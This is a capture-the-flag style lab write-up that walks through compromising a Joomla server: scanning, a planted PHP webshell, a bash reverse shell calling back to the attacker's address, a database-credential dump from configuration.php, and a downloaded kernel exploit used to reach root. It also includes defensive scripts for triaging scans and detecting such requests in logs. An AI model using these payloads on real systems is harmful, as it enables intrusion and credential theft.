Web · Medium · Linux

VHL — CMS01

Joomla CMS on CentOS with anonymous FTP. Exploited an authenticated Joomla RCE CVE through the template editor to get code execution.

February 13, 2025 · Virtual Hacking Labs
#Joomla #RCE #FTP #TemplateEditor

nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.177
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-13 00:26 EST
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 26.32% done; ETC: 00:29 (0:02:09 remaining)
Stats: 0:01:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 37.11% done; ETC: 00:29 (0:01:43 remaining)
Stats: 0:02:09 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 95.01% done; ETC: 00:29 (0:00:07 remaining)
Nmap scan report for 10.11.1.177
Host is up (0.020s latency).
Not shown: 65389 filtered tcp ports (no-response), 140 filtered tcp ports (host-prohibited), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 2.2.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 172.16.1.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 2.2.2 - secure, fast, stable
|_End of status
22/tcp   open  ssh      OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 d8:7c:9d:f7:47:c1:f3:60:88:ad:a4:85:f3:f1:85:b7 (DSA)
|_  2048 e3:fb:0f:74:d5:c1:ce:f1:73:a0:f0:16:ed:f4:e3:dd (RSA)
80/tcp   open  http     Apache httpd 2.2.15 ((CentOS))
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp  open  ssl/http Apache httpd 2.2.15 ((CentOS))
| ssl-cert: Subject: commonName=cms01/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2016-11-20T16:32:24
|_Not valid after:  2017-11-20T16:32:24
|_ssl-date: 2025-02-13T05:28:42+00:00; -51s from scanner time.
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
3306/tcp open  mysql    MySQL (unauthorized)
Device type: general purpose|firewall|storage-misc
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (97%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), IPFire 2.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:linux:linux_kernel:4 cpe:/o:ipfire:ipfire:2.11
Aggressive OS guesses: Linux 2.6.32 (97%), Linux 2.6.32 - 2.6.39 (95%), Linux 2.6.32 - 3.0 (93%), Linux 3.2 - 3.8 (92%), Linux 3.8 (92%), Linux 3.10 - 3.12 (92%), Linux 2.6.32 or 3.10 (92%), Linux 2.6.38 (91%), Linux 2.6.39 (91%), Linux 3.4 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Unix

Host script results:
|_clock-skew: -51s

TRACEROUTE
HOP RTT      ADDRESS
1   20.24 ms 10.11.1.177

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 158.66 seconds
```

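Rather than reading the scan by eye, a defender triaging this host would want the exposures pulled out automatically. The script below is an added example, not part of the original writeup: it parses nmap's normal output (a trimmed copy of the scan above is embedded as sample input) and flags anonymous FTP, cleartext services, an expired TLS certificate and a database port reachable from the scanner. The rule set and the scan date it compares the certificate against are assumptions.

```python
import re
from datetime import datetime

# Constructed sample input: a trimmed copy of the nmap output above.
SAMPLE_SCAN = """\
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 2.2.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
22/tcp   open  ssh      OpenSSH 5.3 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.2.15 ((CentOS))
443/tcp  open  ssl/http Apache httpd 2.2.15 ((CentOS))
| ssl-cert: Subject: commonName=cms01/organizationName=SomeOrganization
| Not valid before: 2016-11-20T16:32:24
|_Not valid after:  2017-11-20T16:32:24
3306/tcp open  mysql    MySQL (unauthorized)
"""

# One nmap port line: "21/tcp   open  ftp      vsftpd 2.2.2"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_ports(text):
    """Return one dict per port line, carrying the NSE script lines below it."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": m.group(5).strip(), "scripts": [],
            })
        elif line.startswith("|") and ports:
            # Script output belongs to the most recent port; drop the "| " / "|_" prefix.
            ports[-1]["scripts"].append(line.lstrip("|_ ").rstrip())
    return ports


def audit(text, scan_date):
    """Flag exposures worth a ticket. scan_date is the datetime the scan ran (assumed)."""
    findings = []
    for p in parse_ports(text):
        if p["state"] != "open":
            continue
        tag = f"{p['port']}/{p['proto']}"
        scripts = "\n".join(p["scripts"])
        if p["service"] == "ftp" and "Anonymous FTP login allowed" in scripts:
            findings.append(f"{tag}: anonymous FTP login allowed")
        if p["service"] in ("ftp", "http"):
            findings.append(f"{tag}: cleartext protocol ({p['service']})")
        m = re.search(r"Not valid after:\s*(\S+)", scripts)
        if m and datetime.fromisoformat(m.group(1)) < scan_date:
            findings.append(f"{tag}: TLS certificate expired {m.group(1)[:10]}")
        if p["service"] == "mysql":
            findings.append(f"{tag}: database service reachable from the scanner")
    return findings


def audit_sample():
    """Run the audit over the embedded sample with the scan date from this writeup."""
    return audit(SAMPLE_SCAN, datetime(2025, 2, 13))


if __name__ == "__main__":
    for finding in audit_sample():
        print(finding)
```

Run against a full `-oN` file the same rules apply; the port-line regex ignores nmap's chatter (timing stats, OS guesses, traceroute) because none of it starts with a port number.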
21

```sh
21/tcp   open  ftp      vsftpd 2.2.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 172.16.1.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 2.2.2 - secure, fast, stable
|_End of status
```

```sh
ftp anonymous@10.11.1.177
Connected to 10.11.1.177.
220 (vsFTPd 2.2.2)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||6272|).
ftp: Can't connect to `10.11.1.177:6272': No route to host
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 24  2015 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> exit
221 Goodbye.
```


80

```sh
80/tcp   open  http     Apache httpd 2.2.15 ((CentOS))
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
```

Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation

```sh
python2 joomraa.py -u test -p password -e test@email.com http://10.11.1.177
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.

     @@@   @@@@@@    @@@@@@   @@@@@@@@@@   @@@@@@@    @@@@@@    @@@@@@   @@@  
     @@@  @@@@@@@@  @@@@@@@@  @@@@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@@  @@@  
     @@!  @@!  @@@  @@!  @@@  @@! @@! @@!  @@!  @@@  @@!  @@@  @@!  @@@  @@!  
     !@!  !@!  @!@  !@!  @!@  !@! !@! !@!  !@!  @!@  !@!  @!@  !@!  @!@  !@   
     !!@  @!@  !@!  @!@  !@!  @!! !!@ @!@  @!@!!@!   @!@!@!@!  @!@!@!@!  @!@  
     !!!  !@!  !!!  !@!  !!!  !@!   ! !@!  !!@!@!    !!!@!!!!  !!!@!!!!  !!!  
     !!:  !!:  !!!  !!:  !!!  !!:     !!:  !!: :!!   !!:  !!!  !!:  !!!       
!!:  :!:  :!:  !:!  :!:  !:!  :!:     :!:  :!:  !:!  :!:  !:!  :!:  !:!  :!:  
::: : ::  ::::: ::  ::::: ::  :::     ::   ::   :::  ::   :::  ::   :::   ::  
 : :::     : :  :    : :  :    :      :     :   : :   :   : :   :   : :  :::  

[-] Getting token
[-] Creating user account
[-] Getting token for admin login
[-] Logging in to admin
[+] Admin Login Success!
[+] Getting media options
[+] Setting media options
[*] Uploading exploit.pht
[*] Uploading exploit to: http://10.11.1.177/images/MOSPTJ5.pht
[*] Calling exploit
[!] Search string not in exploit
<Response [200]>
[*] FAILURE
```

user notes

superuser creds

```
administrator:joomlaadministrator
```

Payload placed in the Protostar template's error.php through the template editor:

```php
system($_GET['0']);
```

  • access webshell http://10.11.1.177/templates/protostar/error.php?0=id

BURP

```http
GET /templates/protostar/error.php?0=bash+-i+>%26+/dev/tcp/172.16.1.1/80+0>%261 HTTP/1.1
```

```sh
nc -lvnp 80
listening on [any] 80 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.177] 48395
bash: no job control in this shell
bash-4.1$ whoami
whoami
apache
```
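From the web server's side, the two requests above leave a clear trace in Apache's access log. The detector below is an added example, not something from the writeup or from Joomla: it parses combined-format log lines (the four sample lines are constructed, using the client and target addresses from this lab) and flags direct requests to a template's PHP files that carry parameters, rating them high when a decoded value contains shell-like content such as `/dev/tcp/` or a pipe. The path rule and the hint list are assumptions that fit a stock Joomla install, where template PHP files are included by the framework rather than requested by browsers.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines (Apache combined/common format). The client is the
# attacker box from this writeup; the last two lines mirror the requests above.
SAMPLE_LOG = [
    '172.16.1.1 - - [13/Feb/2025:00:40:01 -0500] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5123',
    '172.16.1.1 - - [13/Feb/2025:00:41:12 -0500] "GET /templates/protostar/css/template.css HTTP/1.1" 200 33421',
    '172.16.1.1 - - [13/Feb/2025:00:42:30 -0500] "GET /templates/protostar/error.php?0=id HTTP/1.1" 200 97',
    '172.16.1.1 - - [13/Feb/2025:00:43:05 -0500] "GET /templates/protostar/error.php?0=bash+-i+>%26+/dev/tcp/172.16.1.1/80+0>%261 HTTP/1.1" 200 0',
]

LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Assumption: a browser never asks for a template's PHP file directly with
# parameters; Joomla includes error.php, index.php etc. itself.
TEMPLATE_PHP = re.compile(r"^/templates/[^/]+/.*\.php$")

# Shell-like content in a decoded parameter value (heuristic, not a full parser).
SHELL_HINTS = ("/dev/tcp/", "bash -i", "$(", "`", ";", "|", "&")


def parse_line(line):
    """Split one access-log line into its fields; return None if it does not parse."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, ts, method, target, status, _size = m.groups()
    url = urlsplit(target)
    return {
        "ip": ip, "time": ts, "method": method, "path": url.path,
        # parse_qsl URL-decodes values, so %26 and + become & and space.
        "params": parse_qsl(url.query, keep_blank_values=True),
        "status": int(status),
    }


def classify(entry):
    """Return None, 'suspicious' or 'high' for one parsed entry."""
    if not TEMPLATE_PHP.match(entry["path"]) or not entry["params"]:
        return None
    for _name, value in entry["params"]:
        if any(hint in value for hint in SHELL_HINTS):
            return "high"
    return "suspicious"


def scan_log(lines):
    """Return (level, client ip, path, decoded params) for every flagged line."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        level = classify(entry)
        if level:
            hits.append((level, entry["ip"], entry["path"], entry["params"]))
    return hits


def scan_sample():
    return scan_log(SAMPLE_LOG)


if __name__ == "__main__":
    for hit in scan_sample():
        print(hit)
```

The `?0=id` probe only rates "suspicious" because the value itself is innocuous; it is the path that is odd. The reverse-shell request rates "high" once the query is decoded, which is why the detector works on decoded values rather than the raw URL.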

priv esc

```sh
bash-4.1$ uname -a
uname -a
Linux cms01 2.6.32-573.el6.i686 #1 SMP Thu Jul 23 12:37:35 UTC 2015 i686 i686 i386 GNU/Linux
```

config file

```sh
bash-4.1$ cat configuration.php
cat configuration.php
<?php
class JConfig {
	public $offline = '0';
	public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
	public $display_offline_message = '1';
	public $offline_image = '';
	public $sitename = 'Joomla 3.6.3 Test Site';
	public $editor = 'tinymce';
	public $captcha = '0';
	public $list_limit = '20';
	public $access = '1';
	public $debug = '0';
	public $debug_lang = '0';
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'root';
	public $password = 'root1988';
	public $db = 'joomla';
	public $dbprefix = 'yk3ym_';
	public $live_site = '';
	public $secret = 'i5X5ltoz8LACyLu8';
	public $gzip = '0';
	public $error_reporting = 'default';
	public $helpurl = 'https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}';
	public $ftp_host = '127.0.0.1';
	public $ftp_port = '21';
	public $ftp_user = '';
	public $ftp_pass = '';
	public $ftp_root = '';
	public $ftp_enable = '0';
	public $offset = 'UTC';
	public $mailonline = '1';
	public $mailer = 'mail';
	public $mailfrom = 'administrator@cms01.local';
	public $fromname = 'Joomla 3.6.3 Test Site';
	public $sendmail = '/usr/sbin/sendmail';
	public $smtpauth = '0';
	public $smtpuser = '';
	public $smtppass = '';
	public $smtphost = 'localhost';
	public $smtpsecure = 'none';
	public $smtpport = '25';
	public $caching = '0';
	public $cache_handler = 'file';
	public $cachetime = '15';
	public $cache_platformprefix = '0';
	public $MetaDesc = '';
	public $MetaKeys = '';
	public $MetaTitle = '1';
	public $MetaAuthor = '1';
	public $MetaVersion = '0';
	public $robots = '';
	public $sef = '1';
	public $sef_rewrite = '0';
	public $sef_suffix = '0';
	public $unicodeslugs = '0';
	public $feed_limit = '10';
	public $feed_email = 'none';
	public $log_path = '/var/www/html/administrator/logs';
	public $tmp_path = '/var/www/html/tmp';
	public $lifetime = '15';
	public $session_handler = 'database';
```
```sh
╔══════════╣ Operative system
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 2.6.32-573.el6.i686 (mockbuild@c6b9.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Thu Jul 23 12:37:35 UTC 2015
LSB Version:	:base-4.0-ia32:base-4.0-noarch:core-4.0-ia32:core-4.0-noarch:graphics-4.0-ia32:graphics-4.0-noarch:printing-4.0-ia32:printing-4.0-noarch
Distributor ID:	CentOS
Description:	CentOS release 6.7 (Final)
Release:	6.7
Codename:	Final

╔══════════╣ Sudo version
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.6p3
```

```sh
mv /home/sake/Downloads/25444.c ./
```

```sh
docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:4.8 gcc -O2 25444.c -o 25444
```

```sh
bash-4.1$ wget http://172.16.1.1/25444
```

```sh
ssh root@10.11.1.177 -oHostKeyAlgorithms=+ssh-dss
The authenticity of host '10.11.1.177 (10.11.1.177)' can't be established.
DSA key fingerprint is SHA256:ardwRFuS5QwkJwvKm2UXEu0ZU9uQVS0Pu3w4W+2NgYY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.11.1.177' (DSA) to the list of known hosts.
root@10.11.1.177's password: 
Permission denied, please try again.
root@10.11.1.177's password: 
Last login: Tue Apr  6 09:36:10 2021
[root@cms01 ~]# whoami
root
[root@cms01 ~]# cat /root/key.txt
cvxdxsy3cjhhbk0zbfuf
[root@cms01 ~]# date
Thu Feb 13 11:44:13 EST 2025
```